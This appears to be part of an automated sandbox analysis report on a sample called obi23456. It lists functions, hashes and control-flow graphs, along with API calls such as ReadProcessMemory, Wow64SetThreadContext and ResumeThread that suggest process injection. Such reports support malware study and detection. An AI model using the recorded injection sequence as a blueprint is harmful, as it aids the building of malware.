                      • Snapshot File: hcaresult_10_2_180000_obi23456.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: ca59b2d3a4d78601f6a23c3b4d612891a6cf6b6345ecdca10f508cd14dcc9c58
                      • Instruction ID: a9d4fa866c95f8cda570499d78e8d9b3f333c9f6813738eef488165da8d304b6
                      • Opcode Fuzzy Hash: ca59b2d3a4d78601f6a23c3b4d612891a6cf6b6345ecdca10f508cd14dcc9c58
                      • Instruction Fuzzy Hash: 6A31A8B8D002489FCF10CFA9D984AEEFBB1BB49310F20A42AE915B7314D735A945CF64
                      Function 001851D0 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1945 1851d0-18528d ReadProcessMemory 1946 18528f-185295 1945->1946 1947 185296-1852d4 1945->1947 1946->1947
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0018527D
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414086646.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_180000_obi23456.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 06f2a4544d146e8297368ae0d982030244ea9577bde3a8580b17c46a0ccd5e45
                      • Instruction ID: 08089a825ed04fd3d28713fb4b3fef5550cbc564c845487b0df6098c0a13e3cc
                      • Opcode Fuzzy Hash: 06f2a4544d146e8297368ae0d982030244ea9577bde3a8580b17c46a0ccd5e45
                      • Instruction Fuzzy Hash: 563169B9D04258DFCF10CFAAD984ADEFBB1BB19310F14906AE814B7210D375AA45CF65
                      Function 00183D18 Relevance: 1.6, APIs: 1, Instructions: 95threadCOMMON
                      Download Yara Rule
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00183DCF
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414086646.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_180000_obi23456.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 61226b94a5cfca05f09e8debe066a91fcdf8f780e96ee3d1e1ad04d3a5791d3f
                      • Instruction ID: 68ccac832e0be0f421c168ea6ff22e77282e5e9bf546f541e9a191b1d7f45f22
                      • Opcode Fuzzy Hash: 61226b94a5cfca05f09e8debe066a91fcdf8f780e96ee3d1e1ad04d3a5791d3f
                      • Instruction Fuzzy Hash: A041BBB5D012589FCB10DFA9D984AEEFFF1AF49314F24942AE415B7240C7389A49CF54
                      Function 00183D20 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                      Download Yara Rule
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00183DCF
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414086646.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_180000_obi23456.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: d544b699ca63e1fccf888bac0b599d0b1bab8d140b2e3a5d2a54c187123425e5
                      • Instruction ID: 534743fb5d4a96eed54d78d0156b04593d40cc970790bd868639aeac5d69add9
                      • Opcode Fuzzy Hash: d544b699ca63e1fccf888bac0b599d0b1bab8d140b2e3a5d2a54c187123425e5
                      • Instruction Fuzzy Hash: 2931BBB4D002589FCB10DFAAD984AEEFBF1AF49314F24942AE414B7240C738AA45CF54
                      Function 001840B9 Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON
                      Download Yara Rule
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 0018413E
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414086646.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_180000_obi23456.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 465ac4db5084dbf33aecc56417c04e82acaf83f8ba8377dbf9213fc42e56df48
                      • Instruction ID: bdf5423ca7e08101f06c033f1cdb2a8b2c908ad0c6da0bb06449c15761c3f6ba
                      • Opcode Fuzzy Hash: 465ac4db5084dbf33aecc56417c04e82acaf83f8ba8377dbf9213fc42e56df48
                      • Instruction Fuzzy Hash: F531CBB4D012589FCF10CFAAE985AEEFBB1AF49310F24946AE815B7350C734A945CF54
                      Function 001840C0 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                      Download Yara Rule
                      APIs
                      • ResumeThread.KERNELBASE(?), ref: 0018413E
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414086646.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_180000_obi23456.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 5826db577e1c79bb65dfd849d1dc45f799dbcf0c92fea24831177858b4b6da7e
                      • Instruction ID: d364b80d8c618f9dfa195b2749d59e05bb558a1611bd88995dc73b738e27bb21
                      • Opcode Fuzzy Hash: 5826db577e1c79bb65dfd849d1dc45f799dbcf0c92fea24831177858b4b6da7e
                      • Instruction Fuzzy Hash: 1A31BDB4D012189FCF14CFAAD984AEEFBB5AF49314F24942AE815B7300D734A945CF94
                      Function 0012D4CC Relevance: .1, Instructions: 75COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.413931417.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_12d000_obi23456.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2c962dece73207e0a02a0c3f2a44723ef86967c4b3b28628523ba4ae08c8fe1d
                      • Instruction ID: 5b5f86edbf33d59fc23168943775effdf081a036f0d1d819d64c85166516b2df
                      • Opcode Fuzzy Hash: 2c962dece73207e0a02a0c3f2a44723ef86967c4b3b28628523ba4ae08c8fe1d
                      • Instruction Fuzzy Hash: 1921F1B1504240EFDB06DF14F8C0B26BF71EB94318F34C569E8054A256C376D866CBA1
                      Function 0013D1E8 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414004563.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13d000_obi23456.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 67d6b7a54f5ad6bd5d00deb8669858e725b9db8a3e2d2df6a1554c1b6a6ede0a
                      • Instruction ID: 6f8c567f066d3c175ab71428506efd877258320f7dab4185b0fa066874534223
                      • Opcode Fuzzy Hash: 67d6b7a54f5ad6bd5d00deb8669858e725b9db8a3e2d2df6a1554c1b6a6ede0a
                      • Instruction Fuzzy Hash: AF21FFB5604340EFDB05CF24F8C4B26BBA5EB84314F24C9A9E8094B246C376D84ACBA1
                      Function 0013D01C Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414004563.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13d000_obi23456.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
                      • Instruction ID: 4d967bc66fc9d1a25c83f1b7f0c5bf5a08a76d64203610675017b6464fe62645
                      • Opcode Fuzzy Hash: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
                      • Instruction Fuzzy Hash: 8721B0B5604240EFDB19CF24F8C4B26BB65EB84B14F34C5A9E8494B256C736D84BCBA1
                      Function 0013D006 Relevance: .1, Instructions: 63COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414004563.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13d000_obi23456.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
                      • Instruction ID: c93a144368a3656922636856f90339f43b112a12ea4bafa1108d28c1e8bd612a
                      • Opcode Fuzzy Hash: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
                      • Instruction Fuzzy Hash: 502171755083809FCB06CF14E994711BF71EB46714F28C5DAD8498F266C33AD85ACB62
                      Function 0012D4C7 Relevance: .1, Instructions: 56COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.413931417.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_12d000_obi23456.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
                      • Instruction ID: 7a1ce3b9e8f7c66b0e393c1e6661da734fdbbe81af2709869919503151b80091
                      • Opcode Fuzzy Hash: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
                      • Instruction Fuzzy Hash: 9611E676504240CFDB06CF10E9C4B16BF72FB94314F34C6A9D8054B256C33AD96ACBA2
                      Function 0013D1E3 Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414004563.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13d000_obi23456.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                      • Instruction ID: 0037e1be801d687b0eeef2467f8055ee626e754beee274f268e722d8135f06d1
                      • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                      • Instruction Fuzzy Hash: E9119D75504280DFDB02CF54E5C4B16BFA1FB84314F28C6AED8494B656C33AD85ACBA1

                      Execution Graph

                      Execution Coverage:14.3%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:50%
                      Total number of Nodes:14
                      Total number of Limit Nodes:0
                      execution_graph 14137 504720 14138 50472c 14137->14138 14141 5078c1 14138->14141 14139 5047e0 14143 5078c4 14141->14143 14142 507cd9 14142->14139 14143->14142 14146 50fe53 14143->14146 14150 50fcb8 14143->14150 14148 50fd17 14146->14148 14147 50fe0a LdrInitializeThunk 14149 50fdfb 14147->14149 14148->14147 14148->14149 14149->14143 14151 50fcdf 14150->14151 14152 50fe0a LdrInitializeThunk 14151->14152 14153 50fdfb 14151->14153 14152->14153 14153->14143

                      Executed Functions

                      Function 01EA6CC8 Relevance: 11.7, Strings: 9, Instructions: 461COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 1ea6cc8-1ea6ce8 1 1ea6cea 0->1 2 1ea6cef-1ea6dbc 0->2 1->2 4 1ea6dc8-1ea6e0b 2->4 7 1ea74cf-1ea75c0 4->7 8 1ea6e11-1ea6f56 4->8 10 1ea75c8-1ea75ce 7->10 11 1ea75c2-1ea75c7 7->11 21 1ea6fd5-1ea6fef 8->21 11->10 23 1ea6f5b-1ea6f74 21->23 24 1ea6ff5-1ea700e 21->24 29 1ea6f9e 23->29 30 1ea6f76-1ea6f82 23->30 27 1ea7029-1ea704e 24->27 28 1ea7010-1ea7028 24->28 37 1ea70cd-1ea70e7 27->37 28->27 33 1ea6fa4-1ea6fce 29->33 31 1ea6f8c-1ea6f92 30->31 32 1ea6f84-1ea6f8a 30->32 35 1ea6f9c 31->35 32->35 33->21 35->33 41 1ea70ed-1ea7106 37->41 42 1ea7053-1ea706c 37->42 45 1ea7108-1ea7120 41->45 46 1ea7121-1ea7146 41->46 47 1ea706e-1ea707a 42->47 48 1ea7096 42->48 45->46 55 1ea71c2-1ea71dc 46->55 49 1ea707c-1ea7082 47->49 50 1ea7084-1ea708a 47->50 51 1ea709c-1ea70c6 48->51 53 1ea7094 49->53 50->53 51->37 53->51 59 1ea7148-1ea7161 55->59 60 1ea71e2-1ea71fb 55->60 65 1ea718b 59->65 66 1ea7163-1ea716f 59->66 63 1ea71fd-1ea7215 60->63 64 1ea7216-1ea723b 60->64 63->64 73 1ea72bd-1ea72d7 64->73 69 1ea7191-1ea71bb 65->69 67 1ea7179-1ea717f 66->67 68 1ea7171-1ea7177 66->68 71 1ea7189 67->71 68->71 69->55 71->69 77 1ea72dd-1ea72f6 73->77 78 1ea7240-1ea7259 73->78 81 1ea72f8-1ea7310 77->81 82 1ea7311-1ea74ce 77->82 83 1ea725b-1ea7267 78->83 84 1ea7283 78->84 81->82 82->7 86 1ea7269-1ea726f 83->86 87 1ea7271-1ea7277 83->87 85 1ea7289-1ea72b6 84->85 85->73 90 1ea7281 86->90 87->90 90->85
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.937538562.0000000001EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_1ea0000_obi23456.jbxd
                      Similarity
                      • API ID:
                      • String ID: "$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp
                      • API String ID: 0-3547488823
                      • Opcode ID: 56e19d4be3ffe84c1be1d18b7c70970f42ea986b0664f45c1297aa42b3760dcf
                      • Instruction ID: e89217f672f6411f44c8c093bb9e3a8a75370027e2f4a1d9e1cb5f02da094c0a
                      • Opcode Fuzzy Hash: 56e19d4be3ffe84c1be1d18b7c70970f42ea986b0664f45c1297aa42b3760dcf
                      • Instruction Fuzzy Hash: 8E32A174E00218CFDB68DF69D984B9DBBB2BF89304F5080A9D909AB355DB716E85CF10
                      Function 01EA6CBC Relevance: 11.6, Strings: 9, Instructions: 366COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 110 1ea6cbc-1ea6ce8 113 1ea6cea 110->113 114 1ea6cef-1ea6dbc 110->114 113->114 116 1ea6dc8-1ea6e0b 114->116 119 1ea74cf-1ea75c0 116->119 120 1ea6e11-1ea6f56 116->120 122 1ea75c8-1ea75ce 119->122 123 1ea75c2-1ea75c7 119->123 133 1ea6fd5-1ea6fef 120->133 123->122 135 1ea6f5b-1ea6f74 133->135 136 1ea6ff5-1ea700e 133->136 141 1ea6f9e 135->141 142 1ea6f76-1ea6f82 135->142 139 1ea7029-1ea704e 136->139 140 1ea7010-1ea7028 136->140 149 1ea70cd-1ea70e7 139->149 140->139 145 1ea6fa4-1ea6fce 141->145 143 1ea6f8c-1ea6f92 142->143 144 1ea6f84-1ea6f8a 142->144 147 1ea6f9c 143->147 144->147 145->133 147->145 153 1ea70ed-1ea7106 149->153 154 1ea7053-1ea706c 149->154 157 1ea7108-1ea7120 153->157 158 1ea7121-1ea7146 153->158 159 1ea706e-1ea707a 154->159 160 1ea7096 154->160 157->158 167 1ea71c2-1ea71dc 158->167 161 1ea707c-1ea7082 159->161 162 1ea7084-1ea708a 159->162 163 1ea709c-1ea70c6 160->163 165 1ea7094 161->165 162->165 163->149 165->163 171 1ea7148-1ea7161 167->171 172 1ea71e2-1ea71fb 167->172 177 1ea718b 171->177 178 1ea7163-1ea716f 171->178 175 1ea71fd-1ea7215 172->175 176 1ea7216-1ea723b 172->176 175->176 185 1ea72bd-1ea72d7 176->185 181 1ea7191-1ea71bb 177->181 179 1ea7179-1ea717f 178->179 180 1ea7171-1ea7177 178->180 183 1ea7189 179->183 180->183 181->167 183->181 189 1ea72dd-1ea72f6 185->189 190 1ea7240-1ea7259 185->190 193 1ea72f8-1ea7310 189->193 194 1ea7311-1ea74ce 189->194 195 1ea725b-1ea7267 190->195 196 1ea7283 190->196 193->194 194->119 198 1ea7269-1ea726f 195->198 199 1ea7271-1ea7277 195->199 197 1ea7289-1ea72b6 196->197 197->185 202 1ea7281 198->202 199->202 202->197
                      Strings
                      Memory Dump Source
                      • Source File: 0000000B.00000002.937538562.0000000001EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_1ea0000_obi23456.jbxd
                      Similarity
                      • API ID:
                      • String ID: "$PHp$PHp$PHp$PHp$PHp$PHp$PHp$PHp
                      • API String ID: 0-3547488823
                      • Opcode ID: 5db23dcf1c049f5bdb94e68da68b4aa550602bcfb8588bb9e89053681963c71c
                      • Instruction ID: bc9dac8a1ee721c98018636dee21860973c2cb5434fcb3f9b2ce3aa3ba52cc17
                      • Opcode Fuzzy Hash: 5db23dcf1c049f5bdb94e68da68b4aa550602bcfb8588bb9e89053681963c71c
                      • Instruction Fuzzy Hash: 3E02D2B4E002188FDB58DF69D984B9DBBF2BF89304F2081A9D909AB355DB315E85CF10
                      Function 0050FCB8 Relevance: 1.6, APIs: 1, Instructions: 124libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2133 50fcb8-50fcdd 2134 50fce4-50fd4b 2133->2134 2135 50fcdf 2133->2135 2140 50fdd5-50fddb 2134->2140 2135->2134 2141 50fd50-50fd63 2140->2141 2142 50fde1-50fdf9 2140->2142 2143 50fd65 2141->2143 2144 50fd6a-50fda6 2141->2144 2145 50fe0a-50fe2a LdrInitializeThunk 2142->2145 2146 50fdfb-50fe08 2142->2146 2143->2144 2155 50fda8-50fdb6 2144->2155 2156 50fdb9-50fdcb 2144->2156 2147 50fe2c-50ff07 2145->2147 2146->2147 2150 50ff09-50ff0e 2147->2150 2151 50ff0f-50ff18 2147->2151 2150->2151 2155->2142 2159 50fdd2 2156->2159 2160 50fdcd 2156->2160 2159->2140 2160->2159
                      APIs
                      • LdrInitializeThunk.NTDLL(000000FF), ref: 0050FE1A
                      Memory Dump Source
                      • Source File: 0000000B.00000002.937495951.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_500000_obi23456.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 781fd2e355ce7a97a4796d2b3d1087cff95a79ab8ba942dd46208db505d24f64
                      • Instruction ID: 0a6aecc8550cd45bac23d919b1fd212c7ef5b340f91fcfc0a042156e10a0a58a
                      • Opcode Fuzzy Hash: 781fd2e355ce7a97a4796d2b3d1087cff95a79ab8ba942dd46208db505d24f64
                      • Instruction Fuzzy Hash: FC5120B5D01218CFDB28CFAAD8886DDBBB2BF88310F20C52AE414BB294D7749845CF54
                      Function 01EA5E58 Relevance: .7, Instructions: 745COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2198 1ea5e58-1ea5e78 2199 1ea5e7a 2198->2199 2200 1ea5e7f-1ea5ef7 2198->2200 2199->2200 2204 1ea5ef9-1ea5f3f 2200->2204 2205 1ea5f44-1ea5f96 2200->2205 2212 1ea5fdd-1ea6090 2204->2212 2205->2212 2213 1ea5f98-1ea5fdc 2205->2213 2223 1ea609b-1ea60c1 2212->2223 2213->2212 2225 1ea6c76-1ea6cab 2223->2225 2226 1ea60c7-1ea61c9 2223->2226 2236 1ea6c69-1ea6c6f 2226->2236 2237 1ea61ce-1ea62ab 2236->2237 2238 1ea6c75 2236->2238 2246 1ea62ad 2237->2246 2247 1ea62b2-1ea631a 2237->2247 2238->2225 2246->2247 2251 1ea631c 2247->2251 2252 1ea6321-1ea6332 2247->2252 2251->2252 2253 1ea6338-1ea6342 2252->2253 2254 1ea63be-1ea64c4 2252->2254 2255 1ea6349-1ea63bd 2253->2255 2256 1ea6344 2253->2256 2272 1ea64cb-1ea6533 2254->2272 2273 1ea64c6 2254->2273 2255->2254 2256->2255 2277 1ea653a-1ea654b 2272->2277 2278 1ea6535 2272->2278 2273->2272 2279 1ea6551-1ea655b 2277->2279 2280 1ea65d7-1ea678a 2277->2280 2278->2277 2281 1ea655d 2279->2281 2282 1ea6562-1ea65d6 2279->2282 2301 1ea678c 2280->2301 2302 1ea6791-1ea680e 2280->2302 2281->2282 2282->2280 2301->2302 2306 1ea6810 2302->2306 2307 1ea6815-1ea6826 2302->2307 2306->2307 2308 1ea682c-1ea6836 2307->2308 2309 1ea68b2-1ea694b 2307->2309 2310 1ea6838 2308->2310 2311 1ea683d-1ea68b1 2308->2311 2319 1ea694d 2309->2319 2320 1ea6952-1ea69c9 2309->2320 2310->2311 2311->2309 2319->2320 2327 1ea69cb 2320->2327 2328 1ea69d0-1ea69e1 2320->2328 2327->2328 2329 1ea6ace-1ea6b62 2328->2329 2330 1ea69e7-1ea6a7b 2328->2330 2339 1ea6b68-1ea6c53 2329->2339 2340 1ea6c54-1ea6c5f 2329->2340 2345 1ea6a7d 2330->2345 2346 1ea6a82-1ea6acd 2330->2346 2339->2340 2341 1ea6c61 2340->2341 2342 1ea6c66 2340->2342 2341->2342 2342->2236 2345->2346 2346->2329
                      Memory Dump Source
                      • Source File: 0000000B.00000002.937538562.0000000001EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_1ea0000_obi23456.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2619c546f70a542a17b4619ead99e61c62813ba4ec724798cc3e301eabe2fee7
                      • Instruction ID: e8ad1dc3d7021f4a7213e3943bc8ea1b3f194b294719e9e1affdd62594d57931
                      • Opcode Fuzzy Hash: 2619c546f70a542a17b4619ead99e61c62813ba4ec724798cc3e301eabe2fee7
                      • Instruction Fuzzy Hash: 48829174E012688FDB64DF69DC95BDDBBB2AF89300F1481EA950CA7255DB316E81CF40
                      Function 00505B18 Relevance: .7, Instructions: 715COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2360 505b18-505b48 2363 505b4a 2360->2363 2364 505b4f-505bd1 2360->2364 2363->2364 2366 505c38-505c4e 2364->2366 2367 505c50-505c9a call 500374 2366->2367 2368 505bd3-505bdc 2366->2368 2379 505d05-505d06 2367->2379 2380 505c9c-505cdd call 500394 2367->2380 2369 505be3-505c2e call 502864 2368->2369 2370 505bde 2368->2370 2377 505c30 2369->2377 2378 505c35 2369->2378 2370->2369 2377->2378 2378->2366 2381 505d07-505d38 2379->2381 2387 505cff-505d00 2380->2387 2388 505cdf-505cfd 2380->2388 2386 505d3f-505da6 2381->2386 2394 5066f8-50672f 2386->2394 2395 505dac-505dcd 2386->2395 2389 505d01-505d03 2387->2389 2388->2389 2389->2381 2398 5066d5-5066f1 2395->2398 2399 505dd2-505ddb 2398->2399 2400 5066f7 2398->2400 2401 505de2-505e48 call 502f74 2399->2401 2402 505ddd 2399->2402 2400->2394 2407 505e4a 2401->2407 2408 505e4f-505ed9 call 502f84 2401->2408 2402->2401 2407->2408 2415 505eeb-505ef2 2408->2415 2416 505edb-505ee2 2408->2416 2419 505ef4 2415->2419 2420 505ef9-505f06 2415->2420 2417 505ee4 2416->2417 2418 505ee9 2416->2418 2417->2418 2418->2420 2419->2420 2421 505f08 2420->2421 2422 505f0d-505f14 2420->2422 2421->2422 2423 505f16 2422->2423 2424 505f1b-505f72 2422->2424 2423->2424 2427 505f74 2424->2427 2428 505f79-505f90 2424->2428 2427->2428 2429 505f92-505f99 2428->2429 2430 505f9b-505fa3 2428->2430 2431 505fa4-505fae 2429->2431 2430->2431 2432 505fb0 2431->2432 2433 505fb5-505fbe 2431->2433 2432->2433 2434 5066a5-5066ab 2433->2434 2435 5066b1-5066cb 2434->2435 2436 505fc3-505fcf 2434->2436 2445 5066d2 2435->2445 2446 5066cd 2435->2446 2437 505fd1 2436->2437 2438 505fd6-505fdb 2436->2438 2437->2438 2439 505fdd-505fe9 2438->2439 2440 50601e-506020 2438->2440 2443 505ff0-505ff5 2439->2443 2444 505feb 2439->2444 2442 506026-50603a 2440->2442 2447 506040-506055 2442->2447 2448 506683-506690 2442->2448 2443->2440 2449 505ff7-506004 2443->2449 2444->2443 2445->2398 2446->2445 2450 506057 2447->2450 2451 50605c-5060e2 2447->2451 2452 506691-50669b 2448->2452 2453 506006 2449->2453 2454 50600b-50601c 2449->2454 2450->2451 2461 5060e4-50610a 2451->2461 2462 50610c 2451->2462 2455 5066a2 2452->2455 2456 50669d 2452->2456 2453->2454 2454->2442 2455->2434 2456->2455 2463 506116-506136 2461->2463 2462->2463 2465 5062b5-5062ba 2463->2465 2466 50613c-506146 2463->2466 2469 5062bc-5062dc 2465->2469 2470 50631e-506320 2465->2470 2467 506148 2466->2467 2468 50614d-506176 2466->2468 2467->2468 2471 506190-506192 2468->2471 2472 506178-506182 2468->2472 2483 506306 2469->2483 2484 5062de-506304 2469->2484 2473 506326-506346 2470->2473 2477 506231-506240 2471->2477 2475 506184 2472->2475 2476 506189-50618f 2472->2476 2478 50634c-506356 2473->2478 2479 50667d-50667e 2473->2479 2475->2476 2476->2471 2485 506242 2477->2485 2486 506247-50624c 2477->2486 2480 506358 2478->2480 2481 50635d-506386 2478->2481 2482 50667f-506681 2479->2482 2480->2481 2487 5063a0-5063ae 2481->2487 2488 506388-506392 2481->2488 2482->2452 2489 506310-50631c 2483->2489 2484->2489 2485->2486 2490 506276-506278 2486->2490 2491 50624e-50625e 2486->2491 2495 50644d-50645c 2487->2495 2493 506394 2488->2493 2494 506399-50639f 2488->2494 2489->2473 2492 50627e-506292 2490->2492 2497 506260 2491->2497 2498 506265-506274 2491->2498 2499 506197-5061b2 2492->2499 2500 506298-5062b0 2492->2500 2493->2494 2494->2487 2501 506463-506468 2495->2501 2502 50645e 2495->2502 2497->2498 2498->2492 2505 5061b4 2499->2505 2506 5061b9-506223 2499->2506 2500->2482 2503 506492-506494 2501->2503 2504 50646a-50647a 2501->2504 2502->2501 2509 50649a-5064ae 2503->2509 2507 506481-506490 2504->2507 2508 50647c 2504->2508 2505->2506 2522 506225 2506->2522 2523 50622a-506230 2506->2523 2507->2509 2508->2507 2511 5063b3-5063ce 2509->2511 2512 5064b4-50651d 2509->2512 2513 5063d0 2511->2513 2514 5063d5-50643f 2511->2514 2520 506526-506679 2512->2520 2521 50651f-506521 2512->2521 2513->2514 2528 506441 2514->2528 2529 506446-50644c 2514->2529 2525 50667a-50667b 2520->2525 2521->2525 2522->2523 2523->2477 2525->2435 2528->2529 2529->2495
                      Memory Dump Source
                      • Source File: 0000000B.00000002.937495951.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_500000_obi23456.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 43cea4adddc8cb553d7293ef048cbb9bf40cc44bf3100f54eb1c6fa5df6c83f6
                      • Instruction ID: 838c51be0d3d5ebb94e3065a11fb222a55e0ceb0a320ccc6e5a3b4a086de7c8d
                      • Opcode Fuzzy Hash: 43cea4adddc8cb553d7293ef048cbb9bf40cc44bf3100f54eb1c6fa5df6c83f6
                      • Instruction Fuzzy Hash: FE72C174E01229CFDB64DF69C984BDDBBB2BB89300F5485E9D409A7295EB309E81CF50
                      Function 00505038 Relevance: .6, Instructions: 596COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000B.00000002.937495951.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_500000_obi23456.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b5618765573897553e5acf0548ec0d783d69025628f8c52f1e5f7f37dc741df1
                      • Instruction ID: 579e49795d60c551adeee8446d985046b9738d9f8028b0e8f789aa7316ccd260
                      • Opcode Fuzzy Hash: b5618765573897553e5acf0548ec0d783d69025628f8c52f1e5f7f37dc741df1
                      • Instruction Fuzzy Hash: 6752AD74A01228CFDB65DF69D884BDDBBB2BB89300F1485EAD409A7395DB319E81CF50
                      Function 00506740 Relevance: .3, Instructions: 278COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000B.00000002.937495951.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_11_2_500000_obi23456.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 49fa0f87bfd8982cb3380dad0de748ad04b6a95396bd472266742730b64f03a4
